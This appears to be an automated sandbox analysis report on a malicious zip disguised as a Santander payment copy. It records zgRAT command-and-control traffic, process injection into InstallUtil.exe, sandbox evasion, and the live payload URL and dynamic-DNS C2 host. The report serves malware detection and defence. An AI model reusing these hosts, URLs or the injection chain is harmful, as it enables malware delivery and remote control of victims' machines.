Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip

Overview

General Information

Sample name:Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip
renamed because original name is a hash value
Original sample name:Kopia patnoci_Santander_TF1903218545300000564290004.zip
Analysis ID:1573642
MD5:3a201ad107aa7fc528dbec6a21956e13
SHA1:458b00eb63f11169b0cca5fe64de597e1918b1d2
SHA256:949f324ce7dbcaaa19bc2a8dd8b2a5a5ad6f75fed88486023493c79f1336d83d
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected ZipBomb
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64_ra
  • rundll32.exe (PID: 6400 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • Kopia platnosci_Santander_TF1903218545300000564290004.exe (PID: 7152 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe" MD5: AA24DA375E50F1C1C80C3F3452FD1870)
    • InstallUtil.exe (PID: 6968 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zipJoeSecurity_ZipBombYara detected ZipBombJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.1563050163.00000000032D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000005.00000002.1579828371.0000000006ED0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        0000000A.00000002.2416969723.0000000004E20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.2.InstallUtil.exe.4e20000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.6ed0000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  10.2.InstallUtil.exe.364d898.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-12T12:35:51.809684+010028585311Malware Command and Control Activity Detected192.168.2.1649705194.226.169.2275180TCP
                    2024-12-12T12:35:54.107890+010028585311Malware Command and Control Activity Detected192.168.2.1649706194.226.169.2275180TCP
                    2024-12-12T12:35:56.400795+010028585311Malware Command and Control Activity Detected192.168.2.1649707194.226.169.2275180TCP
                    2024-12-12T12:35:58.700902+010028585311Malware Command and Control Activity Detected192.168.2.1649708194.226.169.2275180TCP
                    2024-12-12T12:36:01.002646+010028585311Malware Command and Control Activity Detected192.168.2.1649710194.226.169.2275180TCP
                    2024-12-12T12:36:03.310061+010028585311Malware Command and Control Activity Detected192.168.2.1649711194.226.169.2275180TCP
                    2024-12-12T12:36:05.622946+010028585311Malware Command and Control Activity Detected192.168.2.1649712194.226.169.2275180TCP
                    2024-12-12T12:36:07.915697+010028585311Malware Command and Control Activity Detected192.168.2.1649713194.226.169.2275180TCP
                    2024-12-12T12:36:10.214479+010028585311Malware Command and Control Activity Detected192.168.2.1649714194.226.169.2275180TCP
                    2024-12-12T12:36:12.528904+010028585311Malware Command and Control Activity Detected192.168.2.1649715194.226.169.2275180TCP
                    2024-12-12T12:36:14.826208+010028585311Malware Command and Control Activity Detected192.168.2.1649716194.226.169.2275180TCP
                    2024-12-12T12:36:17.413019+010028585311Malware Command and Control Activity Detected192.168.2.1649717194.226.169.2275180TCP
                    2024-12-12T12:36:19.697745+010028585311Malware Command and Control Activity Detected192.168.2.1649718194.226.169.2275180TCP
                    2024-12-12T12:36:21.994948+010028585311Malware Command and Control Activity Detected192.168.2.1649719194.226.169.2275180TCP
                    2024-12-12T12:36:24.311542+010028585311Malware Command and Control Activity Detected192.168.2.1649720194.226.169.2275180TCP
                    2024-12-12T12:36:26.607550+010028585311Malware Command and Control Activity Detected192.168.2.1649722194.226.169.2275180TCP
                    2024-12-12T12:36:28.900444+010028585311Malware Command and Control Activity Detected192.168.2.1649723194.226.169.2275180TCP
                    2024-12-12T12:36:31.198428+010028585311Malware Command and Control Activity Detected192.168.2.1649724194.226.169.2275180TCP
                    2024-12-12T12:36:33.513996+010028585311Malware Command and Control Activity Detected192.168.2.1649725194.226.169.2275180TCP
                    2024-12-12T12:36:35.808481+010028585311Malware Command and Control Activity Detected192.168.2.1649726194.226.169.2275180TCP
                    2024-12-12T12:36:38.123423+010028585311Malware Command and Control Activity Detected192.168.2.1649727194.226.169.2275180TCP
                    2024-12-12T12:36:40.417127+010028585311Malware Command and Control Activity Detected192.168.2.1649728194.226.169.2275180TCP
                    2024-12-12T12:36:42.734447+010028585311Malware Command and Control Activity Detected192.168.2.1649729194.226.169.2275180TCP
                    2024-12-12T12:36:45.045259+010028585311Malware Command and Control Activity Detected192.168.2.1649730194.226.169.2275180TCP
                    2024-12-12T12:36:47.345856+010028585311Malware Command and Control Activity Detected192.168.2.1649731194.226.169.2275180TCP
                    2024-12-12T12:36:49.635716+010028585311Malware Command and Control Activity Detected192.168.2.1649732194.226.169.2275180TCP
                    2024-12-12T12:36:52.303991+010028585311Malware Command and Control Activity Detected192.168.2.1649733194.226.169.2275180TCP
                    2024-12-12T12:36:54.590046+010028585311Malware Command and Control Activity Detected192.168.2.1649734194.226.169.2275180TCP
                    2024-12-12T12:36:56.890395+010028585311Malware Command and Control Activity Detected192.168.2.1649735194.226.169.2275180TCP
                    2024-12-12T12:36:59.183334+010028585311Malware Command and Control Activity Detected192.168.2.1649736194.226.169.2275180TCP
                    2024-12-12T12:37:01.499003+010028585311Malware Command and Control Activity Detected192.168.2.1649737194.226.169.2275180TCP
                    2024-12-12T12:37:03.811649+010028585311Malware Command and Control Activity Detected192.168.2.1649738194.226.169.2275180TCP
                    2024-12-12T12:37:06.106517+010028585311Malware Command and Control Activity Detected192.168.2.1649739194.226.169.2275180TCP
                    2024-12-12T12:37:08.405096+010028585311Malware Command and Control Activity Detected192.168.2.1649740194.226.169.2275180TCP
                    2024-12-12T12:37:10.702359+010028585311Malware Command and Control Activity Detected192.168.2.1649741194.226.169.2275180TCP
                    2024-12-12T12:37:12.995734+010028585311Malware Command and Control Activity Detected192.168.2.1649742194.226.169.2275180TCP
                    2024-12-12T12:37:15.294241+010028585311Malware Command and Control Activity Detected192.168.2.1649743194.226.169.2275180TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results
                    Source: unknownHTTPS traffic detected: 77.55.253.14:443 -> 192.168.2.16:49704 version: TLS 1.2
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1576725585.0000000005C70000.00000004.08000000.00040000.00000000.sdmp, Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1574315075.000000000434F000.00000004.00000800.00020000.00000000.sdmp, Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1574315075.00000000043C7000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1576725585.0000000005C70000.00000004.08000000.00040000.00000000.sdmp, Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1574315075.000000000434F000.00000004.00000800.00020000.00000000.sdmp, Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1574315075.00000000043C7000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 4x nop then jmp 05C509B5h5_2_05C50867
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 4x nop then jmp 05C509B5h5_2_05C50868
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 4x nop then jmp 05C509B5h5_2_05C50B75

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49712 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49707 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49719 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49715 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49716 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49718 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49711 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49726 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49723 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49724 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49728 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49713 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49725 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49731 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49708 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49737 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49733 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49740 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49734 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49706 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49742 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49710 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49735 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49743 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49714 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49738 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49727 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49739 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49741 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49729 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49717 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49720 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49736 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49705 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49722 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49730 -> 194.226.169.227:5180
                    Source: Network trafficSuricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.16:49732 -> 194.226.169.227:5180
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: scaleofpreferencestill.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.16:49705 -> 194.226.169.227:5180
                    Source: global trafficHTTP traffic detected: GET /filescontentgalleries/pictorialcoversoffiles/Fwudzwsfsp.wav HTTP/1.1Host: sanel.net.plConnection: Keep-Alive
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /filescontentgalleries/pictorialcoversoffiles/Fwudzwsfsp.wav HTTP/1.1Host: sanel.net.plConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: sanel.net.pl
                    Source: global trafficDNS traffic detected: DNS query: scaleofpreferencestill.duckdns.org
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1563050163.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1563050163.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sanel.net.pl
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1563050163.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sanel.net.pl/filescontentgalleries/pictorialcoversoffiles/Fwudzwsfsp.wav
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000000.1281721765.0000000000C82000.00000002.00000001.01000000.00000006.sdmp, Kopia patnoci_Santander_TF1903218545300000564290004.exeString found in binary or memory: https://sanel.net.pl/filescontentgalleries/pictorialcoversoffiles/Fwudzwsfsp.wavKjA756As54Dspe82BtJ.
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownHTTPS traffic detected: 77.55.253.14:443 -> 192.168.2.16:49704 version: TLS 1.2

                    System Summary

                    barindex
                    .NET source code contains very large array initializations
                    Source: 5.2.Kopia platnosci_Santander_TF1903218545300000564290004.exe.4651970.0.raw.unpack, DetailedChain.csLarge array initialization: LinkRemoteChain: array initializer size 362096
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C5FD88 NtProtectVirtualMemory,5_2_05C5FD88
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C5FD81 NtProtectVirtualMemory,5_2_05C5FD81
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05DC1398 NtResumeThread,5_2_05DC1398
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05DC1391 NtResumeThread,5_2_05DC1391
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_0307D2185_2_0307D218
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_030793A75_2_030793A7
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_030793A85_2_030793A8
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_030799385_2_03079938
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C5C8905_2_05C5C890
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C5D7505_2_05C5D750
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C5D7605_2_05C5D760
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C5D9875_2_05C5D987
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C5C8805_2_05C5C880
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C508675_2_05C50867
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_05C508685_2_05C50868
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_0785E5305_2_0785E530
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_0785DAA85_2_0785DAA8
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_078400075_2_07840007
                    Source: C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exeCode function: 5_2_078400405_2_07840040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_00CADAD010_2_00CADAD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_00CA489710_2_00CA4897
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_00CA48A810_2_00CA48A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_00CA51F810_2_00CA51F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_00CA520810_2_00CA5208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_00CA1B2110_2_00CA1B21
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_00CA1B3010_2_00CA1B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DA880010_2_04DA8800
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DA098D10_2_04DA098D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DADA6810_2_04DADA68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DAD31810_2_04DAD318
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DAD46C10_2_04DAD46C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DA2DE010_2_04DA2DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_04DA362610_2_04DA3626
